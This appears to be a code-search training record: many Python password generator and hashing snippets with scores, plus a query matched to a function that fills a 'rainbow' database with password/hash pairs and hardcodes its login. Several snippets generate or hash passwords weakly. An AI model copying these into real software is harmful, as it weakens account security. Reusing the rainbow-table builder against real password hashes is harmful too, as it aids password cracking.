[ "def passwordGen() :\n\treturn __randomString(12)", "def generate_password(c, user=\"root\"):\n passw = subprocess.run(\n [\n \"nix\",\n \"run\",\n \"--inputs-from\",\n \".#\",\n \"nixpkgs#xkcdpass\",\n \"--\",\n \"-d-\",\n \"-n3\",\n \"-C\",\n \"capitalize\",\n ],\n text=True,\n check=True,\n stdout=subprocess.PIPE,\n ).stdout.strip()\n hash = subprocess.run(\n [\n \"nix\",\n \"run\",\n \"--inputs-from\",\n \".#\",\n \"nixpkgs#mkpasswd\",\n \"--\",\n \"-m\",\n \"sha-512\",\n \"-s\",\n ],\n text=True,\n check=True,\n stdout=subprocess.PIPE,\n input=passw,\n ).stdout.strip()\n print(\"# Add the following secrets\")\n print(f\"{user}-password: {passw}\")\n print(f\"{user}-password-hash: {hash}\")", "def generate_pw(self):\n\n chunks = []\n for chunk_no in range(self.CHUNKS):\n if chunk_no < self.chunk:\n chunks.append(self.verified_chunks[chunk_no])\n elif chunk_no == self.chunk:\n chunks.append(str(self.counter).zfill(self.PASSWORD_LENGTH /\n self.CHUNKS))\n else:\n chunks.append(\"000\")\n\n return \"\".join(chunks)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "async def password_generate_complex(self, ctx):\n await ctx.send(\n \"\".join(\n random.choice(string.ascii_letters[:94]) for i in range(random.randint(20, 35))\n )\n )", "def pre_hash(masterpw, password, args):\n salt_hasher = hmac.new(masterpw, digestmod=DIGEST)\n\n if args.salt_url is not None:\n print(\"[INFO] Using resource at URL as salt ...\")\n with urlopen(args.salt_url) as f:\n while True:\n data = f.read(128)\n if len(data) != 0:\n salt_hasher.update(data)\n else:\n break\n\n key_len = int(math.ceil((math.log(len(default_charlist), 2) * args.len_chars) / 8))\n key = pbkdf2(password, salt_hasher.digest(),\n iter_count=args.iterations, dk_len=key_len,\n digest=DIGEST)\n return base_charlist_encode(key, default_charlist)", "def generate_password(plain_password, salt):\n return crypt(plain_password, \"$6$%s\" % salt)", "def password_builder():\n password = Credentials.password_buidler()\n return password", "def store_passwd(self, clr_passwd):\n aes_cipher = AESCipher()\n self.__aes_key = aes_cipher.AES_KEY\n self.__password = aes_cipher.encrypt(clr_passwd)", "def main():\n\n print(\"Password Generator Service\")\n # If no input is given by user then the maximum length password is genearted\n lengthOfPassword = int(input(\"Enter length of password (8 or greater) or leave blank to generate a password of maximum length i.e. 77 characters\\n\") or int(77))\n # Additional Input Validation\n if lengthOfPassword < 8 or lengthOfPassword > 77:\n print(\"Invalid Entry. Enter a value that is 8 or greater and less than 77 characters as they make secure passwords. Please try again\")\n sys.exit()\n\n upperCaseLowerLimit = 65\n upperCaseUpperLimit = 90\n\n lowerCaseLowerLimit = 97\n lowerCaseUpperLimit = 122\n\n specialSymbolsLowerLimit = 33\n specialSymbolsUpperLimit = 47\n\n upperCaseList = [chr(i) for i in range(upperCaseLowerLimit, upperCaseUpperLimit + 1)]\n lowerCaseList = [chr(i) for i in range(lowerCaseLowerLimit, lowerCaseUpperLimit + 1)]\n specialSymbolsList = [chr(i) for i in range(specialSymbolsLowerLimit, specialSymbolsUpperLimit + 1)]\n numbersList = [i for i in range(0,10)]\n\n \"\"\"\n To generate random characters of even greater length the list might have to be duplicated\n This has not be done now due to practical reasons.\n Sample code for doing so can be seen below\n random.sample(upperCaseList*2, len(upperCaseList)*2)\n \"\"\"\n possibleSymbols = random.sample(upperCaseList, len(upperCaseList)) + random.sample(lowerCaseList, len(lowerCaseList)) \\\n + random.sample(specialSymbolsList, len(specialSymbolsList)) + random.sample(numbersList, len(numbersList))\n # the core functionality that determines the complex password\n random.shuffle(possibleSymbols)\n\n finalPassword = ''.join(str(s) for s in possibleSymbols[:lengthOfPassword])\n\n print(\"Your new password of length {} is generated ==> {}\".format(lengthOfPassword, finalPassword))", "def passwd(self, plaintext):\n self._password = bcrypt.generate_password_hash(plaintext.encode('utf8')).decode('utf8')", "def passwordGen(self):\n password = ''\n while len(password) < self.length:\n ls = []\n if self.numeric: ls.append(random.choice(list(string.digits)))\n if self.lower : ls.append(random.choice(list(string.ascii_lowercase)))\n if self.upper : ls.append(random.choice(list(string.ascii_uppercase)))\n if self.symbol : ls.append(random.choice(list(string.punctuation)))\n if not ls: sys.exit(0)\n random.shuffle(ls)\n if self.length - len(password) > len(ls):\n password += ''.join(ls) \n else:\n password += ''.join(ls[:self.length - len(password)])\n\n return password", "def generate_password():\n chars = string.ascii_letters + string.digits\n key = random.sample(chars, 10)\n keys = \"\".join(key)\n return keys", "def giveReadablePassword():\n import random\n words = [\n 'Alpha',\n 'Bravo',\n 'Charlie',\n 'Delta',\n 'Echo',\n 'Foxtrot',\n 'Golf',\n 'Hotel',\n 'India',\n 'Juliet',\n 'Kilo',\n 'Lima',\n 'Mike',\n 'November',\n 'Oscar',\n 'Papa',\n 'Quebec',\n 'Romeo',\n 'Sierra',\n 'Tango',\n 'Uniform',\n 'Victor',\n 'Whiskey',\n 'Xray',\n 'Yankee',\n 'Zulu']\n\n chars = [\n '!',\n '#',\n '$',\n '%',\n '&',\n '*',\n '-',\n '.',\n ':',\n '?',\n '@' \n ]\n\n\n random.seed()\n pw = ''\n pw += random.choice(words)\n pw += random.choice(words)\n pw += random.choice(chars)\n pw += \"{:04d}\".format(random.randint(0,10000))\n return pw", "def password(self, value):\n self.password_hashed = func.crypt(value, func.gen_salt('bf'))", "def genpass(length):\n password = \"\"\n choice = string.ascii_letters + string.digits\n for i in range(length):\n password += random.choice(choice)\n return password", "def make_random_passphrase():\n import random\n prng = random.SystemRandom()\n templates = ['aababbab', 'aabbabab', 'aabbabba', 'abaabbab', 'abababab',\n 'abababba', 'ababbaab', 'ababbaba', 'abbaabab', 'abbaabba',\n 'abbabaab', 'abbababa', 'abbabbaa', 'baababab', 'baababba',\n 'baabbaab', 'baabbaba', 'babaabab', 'babaabba', 'bababaab',\n 'babababa', 'bababbaa', 'babbaaba', 'babbabaa']\n alphabet = {'a':\"aeiou\", 'b':list(\"bcdfghjklmnprsvwxyz\") + [\"ch\",\"ph\",\"st\"]}\n for n in (1,2,3):\n template = prng.choice(templates)\n password = \"\".join([prng.choice(alphabet[c]) for c in template])\n print password.capitalize() + prng.choice(\"0123456789\"),\n return 0", "def gen_hash(self, data):\n password_gen = crypt.encrypt(data)\n return password_gen", "def generate(self):\n\n four_digits = random.choice(string.ascii_uppercase) + random.choice(string.ascii_lowercase) + \\\n random.choice(string.digits) + random.choice(string.punctuation)\n\n if self.pass_length == 4:\n\n # if password is 4 letter long\n self.shuffle_pass(four_digits)\n else:\n\n # if password length is higher than 4 it add some printable letter and add to the four_digit variable\n diff = self.pass_length - 4\n password_long = ''\n i = 1\n while i <= diff:\n i += 1\n p = random.choice(string.printable)\n password_long += p\n self.shuffle_pass(four_digits + password_long)", "def create_password(self):\r\n alphabet = string.ascii_letters + string.digits\r\n password = ''.join(secrets.choice(alphabet) for i in range(30))\r\n\r\n QtWidgets.QMessageBox.information(self, \"Password generated\", \r\n \"{}\".format(password))", "def generate_password():\n return urlsafe_b64encode(urandom(32)).decode('utf-8')", "def generate_pw():\n chars = string.ascii_letters + string.digits + '!@#$%^&*()'\n password = ''.join(random.choice(chars) for i in range(16))\n pyperclip.copy(password)\n print('Password copied to clipboard.')\n return password", "def genPwd(alpha, length):\n # be sure that each character is exactly once present\n alpha = list(set(alpha))\n # return the created password\n return \"\".join([random.choice(alpha) for _ in range(length)])", "def genAlphaNumPwd(length):\n return genPwd(string.ascii_letters + string.digits, length)", "def makepasswd(length = 8, strings = None):\n\n strings = strings or [\n 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',\n 'abcdefghijklmnopqrstuvwxyz',\n '0123456789',\n '+@*#%&/()=?![]{},;.:-_'\n ]\n\n stringslen = len(strings)\n\n # use at least one char from each char string\n lists = range(stringslen)\n\n for i in range(length - stringslen):\n lists.append(random.randrange(0, stringslen))\n\n random.shuffle(lists)\n\n chars = [strings[i][random.randrange(0, len(strings[i]))] for i in lists]\n\n return ''.join(chars)[:length]", "def __encrypt(self, pwd):\n enc_buff = pwd\n m = hashlib.sha256()\n for i in range(int(config.get('security.encrypt_times'))):\n tmp_buff = '-'.join([\n config.get('security.encrypt_times'),\n enc_buff,\n self.salt\n ])\n enc_buff = m.update(tmp_buff)\n enc_buff = m.hexdigest()\n return enc_buff", "def store_lc_passwd(self, clr_passwd):\n aes_cipher = AESCipher()\n self.__aes_key = aes_cipher.AES_KEY\n self.__lc_password = aes_cipher.encrypt(clr_passwd)", "def generate_password(n):\n import os\n import math\n from base64 import b64encode\n return b64encode(os.urandom(int(math.ceil(0.75*n))),'-_')[:n]", "def _load_passwords(names, length=20, generate=False):\n\n for name in names:\n filename = ''.join([env.home, name])\n if generate:\n passwd = _random_password(length=length)\n sudo('touch %s' % filename, user=env.deploy_user)\n sudo('chmod 600 %s' % filename, user=env.deploy_user)\n with hide('running'):\n sudo('echo \"%s\">%s' % (passwd, filename), user=env.deploy_user)\n if files.exists(filename):\n with hide('stdout'):\n passwd = sudo('cat %s' % filename).strip()\n else:\n passwd = getpass('Please enter %s: ' % name)\n setattr(env, name, passwd)", "def passsword(self, password):\n self.passwor_harsh = generate_password_hash(password)", "def generate_password():\n selection = string.ascii_letters + string.digits\n\n while True:\n password = \"\".join(secrets.choice(selection) for i in range(16))\n\n if (\n any(c.isupper() for c in password)\n and any(c.islower() for c in password)\n and any(c.isdigit() for c in password)\n ):\n break\n\n return password", "def password():\n chars = \"abcdefghijklmnopqsrtuvwxyzABCDEFGHIJKLMNOPQSRTUVWXYZ\"\\\n \"123456890!#%&-_*<>+=()\"\n return ''.join(random.sample(chars, 15))", "def password_generator(num_users=1000, password_length=20):\n\n password_list = []\n for ind in range(num_users):\n password = random.randint(0, 2 ** password_length - 1)\n password_list.append(password)\n return password_list", "def generate_passwd(length=6):\n ret = ''\n if length < 6 :\n length = 6\n elif length > 10 :\n length = 10\n for x in xrange(length) :\n if x == 3 :\n ret += '-'\n ret += chr(random.randrange(ord('a'),ord('z'),1))\n return ret", "def generate_random_password(self):\r\n self.symbols = self.__set_symbol_dict() # set new symbol subset dict\r\n self.i = randrange(len(self.symbols)) # set new dict key pointer\r\n return \"\".join(self.__get_random_symbol() for _ in range(self.pw_len))", "def set_passwords(self, passwords):\n self.passwords = {}\n for user_name in passwords:\n self.passwords[user_name] = sha512_crypt.hash(\n passwords[user_name], rounds=5000)", "def password(self) -> str:", "def _encryptDBPass():\n #run encrypt tool on user given password\n controller.CONF[\"ENCRYPTED_DB_PASS\"] = utils.encryptEngineDBPass(password=controller.CONF[\"DB_PASS\"],\n maskList=masked_value_set)", "def generate_password(self):\n password = str()\n\n length = len(self.chars_password)\n for index in range(self.length_password):\n char_index = random.randint(0, length - 1)\n password += self.chars_password[char_index]\n\n return password", "def make_hashed_password(cleartext,salt=None):\n \n if not salt:\n salt = make_salt(5)\n return \"%s|%s\" % (salt,hashlib.sha256(salt + cleartext).hexdigest())", "def make_key(password, iterations=ITERATIONS):\n key = PBKDF2(password, SALT, dkLen=KEY_LENGTH_BYTES, count=iterations)\n return key", "def build_passwords(self, project_update, runtime_passwords):\n passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)\n if project_update.credential:\n passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')\n passwords['scm_username'] = project_update.credential.get_input('username', default='')\n passwords['scm_password'] = project_update.credential.get_input('password', default='')\n return passwords", "def build_passwords(self, job, runtime_passwords):\n passwords = super(RunJob, self).build_passwords(job, runtime_passwords)\n cred = job.machine_credential\n if cred:\n for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):\n value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))\n if value not in ('', 'ASK'):\n passwords[field] = value\n\n for cred in job.vault_credentials:\n field = 'vault_password'\n vault_id = cred.get_input('vault_id', default=None)\n if vault_id:\n field = 'vault_password.{}'.format(vault_id)\n if field in passwords:\n raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))\n value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))\n if value not in ('', 'ASK'):\n passwords[field] = value\n\n '''\n Only 1 value can be provided for a unique prompt string. Prefer ssh\n key unlock over network key unlock.\n '''\n if 'ssh_key_unlock' not in passwords:\n for cred in job.network_credentials:\n if cred.inputs.get('ssh_key_unlock'):\n passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))\n break\n\n return passwords", "def create_password(tamanho=12):\n from random import choice\n caracters = '0123456789abcdefghijlmnopqrstuwvxzkABCDEFGHIJLMNOPQRSTUWVXZK_#'\n senha = ''\n for char in xrange(tamanho):\n senha += choice(caracters)\n return senha", "def random_password():\n\n pool = lowercase + uppercase + digits\n lowerset = set(lowercase)\n upperset = set(uppercase)\n digitset = set(digits)\n length = 10\n\n password = ''.join(choice(pool) for i in range(length - 2))\n\n # Make sure the password is compliant\n chars = set(password)\n if not chars & lowerset:\n password += choice(lowercase)\n if not chars & upperset:\n password += choice(uppercase)\n if not chars & digitset:\n password += choice(digits)\n\n # Pad if necessary to reach required length\n password += ''.join(choice(pool) for i in range(length - len(password)))\n\n return password", "def generate_password(path: str, number: int) -> str:\n password = \"\"\n for i in range(number):\n rand_line = generate_random_numbers_string()\n password += Program.find_string_by_number(rand_line, path)\n\n return password", "def generate_password(cls,password_length):\n alpha = string.ascii_letters + string.digits\n password = ''.join(random.choice(alpha)\n for i in range(password_length))\n return password", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def __init__(self, username, password):\n self.username = username\n self.password = password\n self.salt = os.urandom(32)", "def set_pass(self, pw):\n\t\tself.passhash = generate_password_hash(pw)", "def slow_function(*args, **kwargs):\n print('Password generation...')\n time.sleep(2)\n password = randint(1, 10)\n return password", "def _derive_key(\n self, passphrase: str, otp: YubikeyOTP, *args : bytes\n ) -> bytes:\n return self._context_kdf.derive(\n combine_keys(\n passphrase.encode('utf-8'),\n otp.token.private_uid,\n *args\n )\n )", "def set_password(self, password):\n self.password = generate_password_hash(password, method='pbkdf2:sha256')", "def passphrase():\n a = []\n for i in range(1,6):\n a.append(password())\n # join words into phrase\n p = \" \".join(a)\n # split phrase into a list\n p = list(p)\n # substitute a random character\n rc = \"\"\"1~!#$%^2&*()-=3+[]\\{}4:;\"'<>5?/01236456789\"\"\"\n p[secrets.choice(range(0,len(p)))] = rc[secrets.choice(range(0,len(rc)))]\n # put phrase back together\n p = \"\".join(p)\n return p", "def password_generator(length=8):\n chars = tuple(ascii_letters) + tuple(digits) + tuple(punctuation)\n return \"\".join(choice(chars) for x in range(length))", "def _hashPassword(password):\n charset = './' + ascii_letters + digits\n return crypt.crypt(password, ''.join(random.sample(charset, 2)))", "def genPassword(charOrWords):\n\tcurrentGenPasswordMethod.set(charOrWords)\n\tif charOrWords == \"words\":\n\t\t#Get the data from sliders etc\n\t\tnumberOfWords=genPasswordWordsLengthSlider.getValue()\n\t\tseperator=genPasswordWordsSeperatorVar.get()\n\t\tcommonWords=genPasswordWordCommonVar.get()\n\t\tpassword=generateWordPassword(numberOfWords,seperator,commonWords)\n\telse:\n\t\t#Get the length and amount of symbols etc\n\t\tnumberOfCharacters=genPasswordCharLengthSlider.getValue()\n\t\tnumberOfDigits=genPasswordDigitsSlider.getValue()\n\t\tnumberOfSymbols=genPasswordSymbolsSlider.getValue()\n\t\t#Generate the password\n\t\tpassword=generatePassword(numberOfCharacters,numberOfSymbols,numberOfDigits)\n\tgenPasswordVar.set(password)\n\n\t#Calculate password strength\n\tpasswordStrength=calculatePasswordStrength(password,split=genPasswordWordsSeperatorVar.get())\n\tpasswordScoreString=passwordStrength[5]\n\t#Show labels\n\tif passwordScoreString == \"Strong\":\n\t\tgenPasswordStrengthVar.set(\"Strong password\")\n\t\tgenPasswordLabel.config(fg=\"#66BC15\")\n\n\telif passwordScoreString == \"Medium\":\n\t\tgenPasswordStrengthVar.set(\"Medium password\")\n\t\tgenPasswordLabel.config(fg=mainOrangeColour)\n\n\telse:\n\t\tgenPasswordStrengthVar.set(\"Weak password\")\n\t\tgenPasswordLabel.config(fg=mainRedColour)\n\n\t#Add to the review screen\n\taddDataToWidget(genReviewEntry,password)\n\treviewPassword()", "def _password_generator(size: int = 12, chars: Optional[str] = None) -> str:\n if chars is None:\n chars = string.ascii_letters + string.digits\n return ''.join(random.choice(chars) for _ in range(size))", "def new_password():\n new_pass = generate_password()\n entry_pass.delete(0, END)\n entry_pass.insert(0, new_pass)", "async def password(self, ctx):\n pass", "def build_passwords(self, ad_hoc_command, runtime_passwords):\n passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)\n cred = ad_hoc_command.credential\n if cred:\n for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):\n value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))\n if value not in ('', 'ASK'):\n passwords[field] = value\n return passwords", "def generate_user(username, passwd, ctype=\"crypt\"):\n return \"%s:%s\" % (username, hash_password(passwd, ctype))", "def password_generator(self):\n password_list = []\n for generated in JugglerPassGen.generate(self.word): # call the function for permutations\n password_list.append(generated)\n return password_list", "def generate_password():\n numbers = ['0', '1', '2', '3', '4', '5'] \n chars = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n temp_passs = \"\"\n temp_pass = \"\"\n\n for i in range(4):\n rand_num = random.choice(numbers)\n temp_pass += temp_pass.join(rand_num)\n # rand_chars = random.choice(chars)\n for i in range(4):\n rand_chars = random.choice(chars)\n temp_passs += temp_passs.join(rand_chars)\n return(temp_pass + \"-\" + temp_passs)", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def generate_password() -> str:\n list_letters = [choice(LETTERS) for _ in range(randint(8, 10))]\n list_symbols = [choice(SYMBOLS) for _ in range(randint(2, 4))]\n list_numbers = [choice(NUMBERS) for _ in range(randint(2, 4))]\n password_list = [n for n in list_letters + list_symbols + list_numbers]\n shuffle(password_list)\n return \"\".join(password_list)", "def gen_pass(*, pw_length=10, use_nums=True, use_special=True,\n no_dupes=False, no_ambiguous=True):\n # Build up desired population of characters\n charset = LETTERS\n if use_nums:\n charset += NUMS\n if use_special:\n charset += SPECIALS\n if no_ambiguous:\n charset = ''.join([x for x in charset if x not in AMBIGUOUS])\n\n if no_dupes:\n x, tmp = pw_length, []\n while x > 0:\n val = ''.join(random.sample(charset, 1))\n if val not in tmp:\n tmp.append(val)\n x -= 1\n return ''.join(tmp)\n else:\n return ''.join(random.sample(charset, pw_length))", "def generate_password(self, length):\n items = [\"a\", \"e\", \"i\", \"o\", \"u\", \"1\", \"2\", \"4\", \"5\", \"7\", \"8\", \"9\"]\n\n new_password = \"\"\n while(len(new_password) < length):\n item = items[randint(0, len(items) - 1)]\n new_password += item\n return new_password", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "def create_password_hash(self, password):\n return pbkdf2_sha256.encrypt(password, rounds=1000, salt_size=16)", "def generate_password(stringLength):\n lettersAndDigits = string.ascii_letters + string.digits\n password = ''.join(random.choice(lettersAndDigits)\n for i in range(stringLength))\n add_credential(social, username, password)\n print(\">Generated password: {}\".format(password))\n return", "def generate_password(self): \n\n password = []\n length = input(\"Enter Length for Password (At least 8): \")\n\n if length.lower().strip() == \"exit\":\n raise UserExits\n elif length.strip() == \"\":\n raise EmptyField\n elif int(length) < 8:\n raise PasswordNotLongEnough\n else:\n # generating a password\n spinner = Halo(text=colored(\"Generating Password\", \"green\"), spinner=self.dots_, color=\"green\")\n spinner.start()\n for i in range(0, int(length)):\n #choose character from one of the lists randomly\n password.append(random.choice(random.choice([string.ascii_lowercase, string.ascii_uppercase, string.digits, self.specialChar_])))\n\n finalPass = \"\".join(password)\n spinner.stop()\n\n return finalPass", "def new_password(self):\n # create new password\n return password_generator.create_password()\n # have password reset", "def _set_password(self, password):\n self._password = generate_password_hash(password)", "def password(length,num=False,strength='weak'):\r\n lower = string.ascii_lowercase\r\n upper = string.ascii_uppercase\r\n letter = lower + upper\r\n dig = string.digits\r\n punct = string.punctuation\r\n pwd = ''\r\n if strength == 'weak':\r\n if num:\r\n length -= 2\r\n for i in range(2):\r\n pwd += random.choice(dig)\r\n for i in range(length):\r\n pwd += random.choice(lower)\r\n\r\n elif strength == 'strong':\r\n if num:\r\n length -=2\r\n for i in range(2):\r\n pwd += random.choice(dig)\r\n for i in range(length):\r\n pwd += random.choice(letter)\r\n elif strength == 'very':\r\n ran = random.randint(2,4)\r\n if num:\r\n length -= ran\r\n for i in range(ran):\r\n pwd += random.choice(dig)\r\n length -= ran\r\n for i in range(ran):\r\n pwd += random.choice(punct)\r\n for i in range(length):\r\n pwd += random.choice(letter)\r\n pwd = list(pwd)\r\n random.shuffle(pwd)\r\n return ''.join(pwd)", "def password(customer_info, stringLength=5):\n letters = string.ascii_lowercase\n rand_string = ''.join(random.choice(letters) for i in range(stringLength))\n user_password = rand_string + str(customer_info[0][0:2] + customer_info[1][-2:])\n return user_password", "def setpassword(self, pwd):\n pass", "def gen_passphrase(self):\n return ''.join(\n random.sample(map(str, range(0,10)) +\n map(chr, range(ord('a'), ord('z') + 1)) +\n map(chr, range(ord('A'), ord('Z') + 1)), self.passphraselen))", "def pwgen(length=16, ichars=string.ascii_letters+string.digits):\n return ''.join(random.choice(ichars) for i in range(length))", "def _buildPassword(username, createdTime, password):\n if not password:\n return ''\n\n tmp = ''.join((username, str(createdTime).split('.')[0], password, settings['salt']))\n\n sha1 = hashlib.sha224()\n sha1.update(tmp)\n\n return sha1.hexdigest()", "def encrypt_password(password,salt=None):\n\tif salt is None:\n\t\tsalt = os.urandom(8) #64 bits\n\n\tassert 8 == len(salt)\n\tassert isinstance(salt,str)\n\n\tif isinstance(password,unicode):\n\t\tpassword = password.encode('UTF-8')\n\n\tassert isinstance(password,str)\n\n\tresult = password\n\tfor i in xrange(10):\n\t\tresult = HMAC(result,salt,sha256).digest()\n\treturn salt + result", "def _random_password(self):\n return ''.join([\n random.choice(string.ascii_letters + string.digits)\n for _ in range(12)\n ])", "def create_passlocker(username, userpasslock, email):\n new_passlocker = passlocker(username, userpasslock, email)", "def encrypt_password(password: str) -> str:\n return pwd_context.hash(password)", "def passwd_encryption(self):\n key = Fernet.generate_key()\n cipher_suite = Fernet(key)\n bin_passwd = bytes(self.password, 'utf-8')\n ciphered_text = cipher_suite.encrypt(bin_passwd)\n with open(self.pass_path, 'wb') as pass_output:\n pass_output.write(ciphered_text)\n with open(self.key_path, 'wb') as key_output:\n key_output.write(key)", "def __hash_new_password(password: str) -> Tuple[bytes, bytes]:\n salt = os.urandom(16)\n pw_hash = hashlib.pbkdf2_hmac(\"sha256\", password.encode(), salt, 100000)\n return salt, pw_hash", "def randompassword():\n characters = string.ascii_uppercase + string.ascii_lowercase + string.digits\n size = random.randint(8, 12)\n return ''.join(random.choice(characters) for x in range(size))", "def _generateSecretKey():\n return f\"secret.{str(datetime.now())}\"", "def get_password(wordlen, digitlen, words, strength):\n\n while True:\n\n try:\n w = words.pop().capitalize()\n except IndexError:\n sys.exit(\"Unable to get a sufficiently strong password\")\n\n s = np.random.choice(SPECIAL_CHARS)\n i = np.random.randint(0, 10**digitlen)\n\n comp = [w, f\"{i:0{digitlen}d}\", s, s]\n np.random.shuffle(comp)\n pw = ''.join(comp)\n\n # pw = str(f\"{s}{w}{i:0{digitlen}d}{s}\")\n stats_pw = PasswordStats(pw)\n\n if stats_pw.strength() >= strength:\n return pw, stats_pw", "def password(self, password):\n\n self.password_hash = generate_password_hash(password)", "def _generateSecretKey():\n return ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(20))", "def __generate_hash(password):\n if password is None:\n return None\n return bcrypt.generate_password_hash(password, rounds=10).decode(\"utf8\")", "def make_salt():\n return ''.join(random.choice(string.letters) for x in xrange(5))", "def randomPassword(self):\n pwd = \"\"\n charsLength = len(self.chars)\n for i in range(self.pwdLength):\n pwd += self.chars[randrange(charsLength)]\n return pwd", "def generate_password_hash(event=None, user_id=None):\n\n suffix_key = f'password{event}'\n hexkey = str.encode(f'{user_id}{suffix_key}')\n\n # md5 value[1:10] + 1\n passwd = '{0}{1}'.format(hashlib.md5(hexkey).hexdigest()[1:10], 1)\n\n return passwd", "def build_passwords(self, instance, runtime_passwords):\n return {\n 'yes': 'yes',\n 'no': 'no',\n '': '',\n }", "def xkcd_password(number_of_words: int = 4) -> str:\n with open('/usr/share/dict/words') as f:\n words = [word.strip() for word in f]\n password = ' '.join(secrets.choice(words) for i in range(number_of_words))\n return password", "def newPassword(a, b):\n if len(a) > len(b):\n return combine(a[:len(b)], b) + a[len(b):]\n elif len(a) < len(b):\n return combine(a, b[:len(a)]) + b[len(a):]\n else:\n return combine(a, b)" ]
[ "0.68011814", "0.6634942", "0.65811294", "0.6548595", "0.6521094", "0.64116335", "0.6410874", "0.6394931", "0.63810545", "0.637443", "0.6355256", "0.63321126", "0.63251275", "0.6267523", "0.62596804", "0.62588465", "0.6251437", "0.62477094", "0.6220845", "0.62131107", "0.6190429", "0.61877793", "0.6171936", "0.6162081", "0.6158861", "0.6154047", "0.6141332", "0.6080049", "0.6059574", "0.60545135", "0.6039777", "0.6035047", "0.603291", "0.60274035", "0.60267496", "0.6018977", "0.59869", "0.5985532", "0.59819055", "0.5967296", "0.59647375", "0.59597206", "0.59459454", "0.59384114", "0.59305125", "0.59195876", "0.59146225", "0.59129363", "0.5909479", "0.5905194", "0.58984643", "0.5875557", "0.58741933", "0.5870111", "0.58552915", "0.58521193", "0.5849128", "0.58482516", "0.5847766", "0.58462924", "0.58443534", "0.583543", "0.5834108", "0.58306265", "0.58135337", "0.5804498", "0.57951015", "0.5790844", "0.57874894", "0.57874894", "0.57874894", "0.57874894", "0.57842046", "0.57767123", "0.57760954", "0.57731926", "0.575852", "0.57474446", "0.57465863", "0.57396674", "0.57275456", "0.5724136", "0.57185185", "0.5716103", "0.5700844", "0.5696929", "0.56967443", "0.5695713", "0.56900716", "0.5680892", "0.5680694", "0.5679842", "0.5678733", "0.56758064", "0.5673807", "0.5672365", "0.56450397", "0.56437695", "0.56389284", "0.5638245", "0.5634251" ]
0.0
-1
pull data from the queue and add to database
def record_data(q): db = psycopg2.connect( dbname='rainbow', host='humpy', user='rainbow', password='bowrain', ); cur = db.cursor(); while True: vals = q.get() for val in vals: #print val['h'] try: cur.execute(""" INSERT INTO three_des (pass, hash) VALUES(%(p)s, %(h)s) """, val ) except: print "Failed to insert" db.commit() q.task_done()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def worker(self, queue):\n with sa.create_engine(dsn).connect() as dbcon:\n while True:\n if queue.qsize() == 0:\n sleep(1)\n if queue.qsize() == 0:\n break\n continue\n item = queue.get()\n try:\n if hash(item['title']) in self.exist_products:\n dbcon.execute(Product.update().values(**item).where(Product.c.id == self.get_id(item)))\n else:\n result = dbcon.execute(Product.insert().values(**item))\n self.exist_products[hash(item['title'])] = result.inserted_primary_key[0]\n except Exception as e:\n print(type(e), e)", "def queue_handler(self):\n work_queue = []\n query_count = 0\n\n while query_count < self.count:\n work_queue.append(self.build_packet(self.record))\n query_count += 1\n\n self.send_queries(work_queue)", "def run(self):\n while True :\n try :\n instance_id = self.queue.get()\n db.hset(application_name,instance_id,1)\n except:\n pass\n finally:\n pass", "def on_yt_video_queue_add(self, data):\n # video_time = data[6]\n # queue number? = data[7]\n print ('%s added %s (%s) to the video queue.' % (data[3], data[5], data[4]))", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "def _mq_callback(self, message):\n try:\n raw_data = RawData(message.body)\n try:\n session = self.ss_dao.get_one(raw_data.key[0], raw_data.session_id)\n\n # update the click_xxx info\n session = self.update_session_body(raw_data, session)\n duration = raw_data.key[1] - time_helper.session_to_epoch(session.key[1])\n session.total_duration = duration\n\n index = session.number_of_entries\n self.add_entry(session, index, raw_data)\n self.performance_ticker.update.increment_success()\n except LookupError:\n # insert the record\n session = SingleSession()\n\n # input data constraints - both session_id and user_id must be present in MQ message\n session.key = (raw_data.key[0], time_helper.raw_to_session(raw_data.key[1]))\n session.session_id = raw_data.session_id\n session.ip = raw_data.ip\n session.total_duration = 0\n\n session = self.update_session_body(raw_data, session)\n self.add_entry(session, 0, raw_data)\n self.performance_ticker.insert.increment_success()\n\n if time.time() - self._last_safe_save_time < self.SAFE_SAVE_INTERVAL:\n is_safe = False\n else:\n is_safe = True\n self._last_safe_save_time = time.time()\n\n self.ss_dao.update(session, is_safe)\n self.consumer.acknowledge(message.delivery_tag)\n except AutoReconnect as e:\n self.logger.error('MongoDB connection error: %r\\nRe-queueing message & exiting the worker' % e)\n self.consumer.reject(message.delivery_tag)\n raise e\n except (KeyError, IndexError) as e:\n self.logger.error('Error is considered Unrecoverable: %r\\nCancelled message: %r' % (e, message.body))\n self.consumer.cancel(message.delivery_tag)\n except Exception as e:\n self.logger.error('Error is considered Recoverable: %r\\nRe-queueing message: %r' % (e, message.body))\n self.consumer.reject(message.delivery_tag)", "def enqueue(self, record):\r\n self.queue.put_nowait(record)", "def set_queue_data(data):\n while(not grove_queue.empty):\n grove_queue.get()\n grove_queue.put(data)", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if 